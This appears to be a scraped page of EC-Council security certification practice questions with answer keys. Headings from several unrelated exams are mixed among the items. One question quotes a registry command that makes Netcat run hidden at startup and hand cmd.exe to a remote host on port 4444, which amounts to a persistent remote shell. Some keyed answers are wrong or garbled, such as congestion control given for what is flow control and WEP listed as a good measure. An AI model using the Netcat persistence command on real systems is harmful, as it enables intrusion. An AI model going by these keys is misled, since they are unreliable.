312-38 EC-CouncilNetwork SecurityAdministrator Practice Test Set 3

Fill in the blank with the appropriate term. A ______________ is a physical or logical subnetwork that adds an additional layer of security to an organization's Local Area Network (LAN).


Options are :

  • None
  • demilitarized zone (Correct)

Answer : demilitarized zone

Which of the following is a software tool used in passive attacks for capturing network traffic?


Options are :

  • Intrusion prevention system
  • Intrusion detection system
  • Warchalking
  • Sniffer (Correct)

Answer : Sniffer

You have just set up a wireless network for customers at a coffee shop. Which of the following are good security measures to implement? Each correct answer represents a complete solution. Choose two.

A. Using WPA encryption

B. Not broadcasting SSID

C. Using WEP encryption

D. MAC filtering the router


Options are :

  • D,C
  • B,D
  • A,C (Correct)
  • C,D

Answer : A,C

ECCouncil EC0-232 ec0-232 E-Commerce Architect Practice Exam Set 8

Which of the following provide an "always on" Internet access service when connecting to an ISP?Each correct answer represents a complete solution. Choose two.

A. Digital modem

B. Cable modem

C. Analog modem

D. DSL


Options are :

  • D,B
  • B,D (Correct)
  • A,C
  • C,A

Answer : B,D

Which of the following steps are required in an idle scan of a closed port?Each correct answer represents a part of the solution. Choose all that apply.

A. The attacker sends a SYN/ACK to the zombie.

B. The zombie's IP ID increases by only 1.

C. In response to the SYN, the target sends a RST.

D. The zombie ignores the unsolicited RST, and the IP ID remains unchanged.

E. The zombie's IP ID increases by 2.


Options are :

  • A,B,C,D (Correct)
  • E,B,C,D
  • D,A,B,C
  • E,D,A,B
  • C,B,D,E

Answer : A,B,C,D

Which of the following key features is used by TCP in order to regulate the amount of data sent by a host to another host on the network?


Options are :

  • Sequence number
  • TCP timestamp
  • Congestion control (Correct)
  • Flow control

Answer : Congestion control

ECCouncil 312-38 Network Security Administrator (ENSA) Exam Set 7

Which of the following fields in the IPv6 header is decremented by 1 for each router that forwards the packet?


Options are :

  • Next header
  • Hop limit (Correct)
  • Traffic class
  • Flow label

Answer : Hop limit

Fill in the blank with the appropriate word. A______________policy is defined as the document that describes the scope of an organization's security requirements.


Options are :

  • None
  • security (Correct)

Answer : security

John works as an Incident manager for TechWorld Inc. His task is to set up a wireless network for his organization. For this, he needs to decide the appropriate devices and policies required to set up the network. Which of the following phases of the incident handling process will help him accomplish the task?


Options are :

  • Containment
  • Recovery
  • Preparation (Correct)
  • Eradication

Answer : Preparation

ECCouncil EC0-479 Certified Security Analyst (ECSA) Exam Set 3

Which of the following types of coaxial cable is used for cable TV and cable modems?


Options are :

  • RG-59 (Correct)
  • RG-62
  • RG-58
  • RD-8

Answer : RG-59

Fill in the blank with the appropriate term. ______________is the use of sensitive words in e-mails to jam the authorities that listen in on them by providing a form of a red herring and an intentional annoyance.


Options are :

  • Email jamming (Correct)
  • None

Answer : Email jamming

In which of the following attacks do computers act as zombies and work together to send out bogus messages, thereby increasing the amount of phony traffic?


Options are :

  • Buffer-overflow attack
  • Bonk attack
  • Smurf attack
  • DDoS attack (Correct)

Answer : DDoS attack

ECCouncil 712-50 Certified CISO (CCISO) Practice Exam Set 7

Which of the following is an Internet application protocol used for transporting Usenet news articles between news servers and for reading and posting articles by end-user client applications?


Options are :

  • NNTP (Correct)
  • DCAP
  • NTP
  • BOOTP

Answer : NNTP

Fill in the blank with the appropriate term.______________is a codename referring to investigations and studies of compromising emission (CE).


Options are :

  • TEMPEST (Correct)
  • None

Answer : TEMPEST

Which of the following are the common security problems involved in communications and email? Each correct answer represents a complete solution. Choose all that apply.

A. False message

B. Message digest

C. Message replay

D. Message repudiation

E. Message modification

F. Eavesdropping

G. Identity theft


Options are :

  • D,A,E,F,C,B
  • F,E,A,C,B,G
  • A,C,D,E,F,G
  • E,A,D,C,G,F
  • A,C,D,E,F,G (Correct)
  • G,E,A,D,C,B
  • C,D,A,E,F,G

Answer : A,C,D,E,F,G

ECCouncil 312-76Disaster Recover Professional Practice Exam Set 6

This is a Windows-based tool that is used for the detection of wireless LANs using the IEEE 802.11a, 802.11b, and 802.11g standards. The main features of these tools are as follows: It displays the signal strength of a wireless network, MAC address, SSID, channel details, etc. It is commonly used for the following purposes: a.War drivingb.Detecting unauthorized access pointsc.Detecting causes of interference on a WLANd.WEP ICV error trackinge.Making Graphs and Alarms on 802.11 Data, including Signal StrengthThis tool is known as __________.


Options are :

  • Kismet
  • Absinthe
  • THC-Scan
  • Net Stumbler (Correct)

Answer : Net Stumbler

Which of the following standards is a proposed enhancement to the 802.11a and 802.11b wireless LAN (WLAN) specifications that offers quality of service (QoS) features, including the prioritization of data, voice, and video transmissions?


Options are :

  • 802.11n
  • 802.11h
  • 802.15
  • 802.11e (Correct)

Answer : 802.11e

Which of the following is a digital telephone/telecommunication network that carries voice, data, and video over an existing telephone network infrastructure?


Options are :

  • ISDN (Correct)
  • PPP
  • Frame relay
  • X.25

Answer : ISDN

EC0-349 Computer Hacking Forensic Investigator Exam Set 7

Which of the following representatives in the incident response process are included in the incident response team? Each correct answer represents a complete solution. Choose all that apply.

A. Information security representative

B. Legal representative

C. Technical representative

D. Lead investigator

E. Human resources

F. Sales representative


Options are :

  • A,B,C,D,E (Correct)
  • F,D,A,B,C
  • C,F,E,D,A
  • F,C,A,D,B
  • B,C,A,D,E
  • D,C,F,A,B

Answer : A,B,C,D,E

Which of the following steps of the OPSEC process examines each aspect of the planned operation to identify OPSEC indicators that could reveal critical information and then compare those indicators with the adversary's intelligence collection capabilities identified in the previous action?


Options are :

  • Analysis of Vulnerabilities (Correct)
  • Application of Appropriate OPSEC Measures
  • Identification of Critical Information
  • Assessment of Risk
  • Analysis of Threats

Answer : Analysis of Vulnerabilities

Which of the following help in estimating and totaling up the equivalent money value of the benefits and costs to the community of projects for establishing whether they are worthwhile? Each correct answer represents a complete solution. Choose all that apply.

A. Business Continuity Planning

B. Benefit-Cost Analysis

C. Disaster recovery

D. Cost-benefit analysis


Options are :

  • C,A
  • D,C
  • A,B
  • B,D (Correct)

Answer : B,D

ECCouncil 712-50 Certified CISO (CCISO) Practice Exam Set 5

Mark works as a Network Administrator for Infonet Inc. The company has a Windows 2000 Active Directory domain-based network. The domain contains one hundred Windows XP Professional client computers. Mark is deploying an 802.11 wireless LAN on the network. The wireless LAN will use Wired Equivalent Privacy (WEP) for all the connections. According to the company's security policy, the client computers must be able to automatically connect to the wireless LAN. However, the unauthorized computers must not be allowed to connect to the wireless LAN and view the wireless network. Mark wants to configure all the wireless access points and client computers to act in accordance with the company's security policy. What will he do to accomplish this? Each correct answer represents a part of the solution. Choose three.

A. Install a firewall software on each wireless access point.

B. Configure the authentication type for the wireless LAN to Shared Key.

C. Disable SSID Broadcast and enable MAC address filtering on all wireless access points.

D. Broadcast SSID to connect to the access point (AP).

E. Configure the authentication type for the wireless LAN to Open system.

F. On each client computer, add the SSID for the wireless LAN as the preferred network.


Options are :

  • F,C,B
  • C,F,A
  • A,B,D
  • E,D,A
  • D,C,E
  • B,C,F (Correct)

Answer : B,C,F

Which of the following steps will NOT make a server fault tolerant? Each correct answer represents a complete solution. Choose two.

A. Adding a second power supply unit

B. Performing regular backup of the server

C. Adding one more same sized disk as mirror on the server

D. Implementing cluster servers facility

E. Encrypting confidential data stored on the server


Options are :

  • C,D
  • B,E (Correct)
  • B,C
  • A,B
  • C.A

Answer : B,E

Which of the following is a communication protocol that multicasts messages and information among all member devices in an IP multicast group?


Options are :

  • EGP
  • IGMP (Correct)
  • BGP
  • ICMP

Answer : IGMP

ECCouncil 312-76Disaster Recover Professional Practice Exam Set 6

Which of the following attacks is a class of brute force attacks that depends on the higher likelihood of collisions found between random attack attempts and a fixed degree of permutations?


Options are :

  • Phishing attack
  • Dictionary attack
  • Birthday attack (Correct)
  • Replay attack

Answer : Birthday attack

Which of the following plans is documented and organized for emergency response, backup operations, and recovery maintained by an activity as part of its security program that will ensure the availability of critical resources and facilitates the continuity of operations in an emergency situation?


Options are :

  • Continuity Of Operations Plan
  • Business Continuity Plan
  • Disaster Recovery Plan
  • Contingency Plan (Correct)

Answer : Contingency Plan

Fill in the blank with the appropriate term.______________ is a prime example of a high-interaction honeypot.


Options are :

  • Honeynet (Correct)
  • None

Answer : Honeynet

Computer Hacking Forensic Investigator (CHFI) Version 9 Test Practice

Which of the following protocols is used for inter-domain multicast routing and natively supports "source-specific multicast" (SSM)?


Options are :

  • BGMP (Correct)
  • EIGRP
  • DVMRP
  • OSPF

Answer : BGMP

Which of the following router configuration modes changes terminal settings on a temporary basis, performs basic tests, and lists system information?


Options are :

  • User EXEC (Correct)
  • Interface Config
  • Privileged EXEC
  • Global Config

Answer : User EXEC

You run the following command on the remote Windows server 2003 computer:c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d"c:\windows\nc.exe -d 192.168.1.7 4444 -ecmd.exe"What task do you want to perform by running this command?Each correct answer represents acomplete solution. Choose all that apply.

A. You want to perform banner grabbing.

B. You want to put Netcat in the stealth mode.

C. You want to add the Netcat command to the Windows registry.

D. You want to set the Netcat to execute command any time.


Options are :

  • A,C,B
  • B,C,D (Correct)
  • D,C,B
  • B,D,A

Answer : B,C,D

ECCouncil EC0-232 ec0-232 E-Commerce Architect Practice Exam Set 8

Comment / Suggestion Section
Point our Mistakes and Post Your Suggestions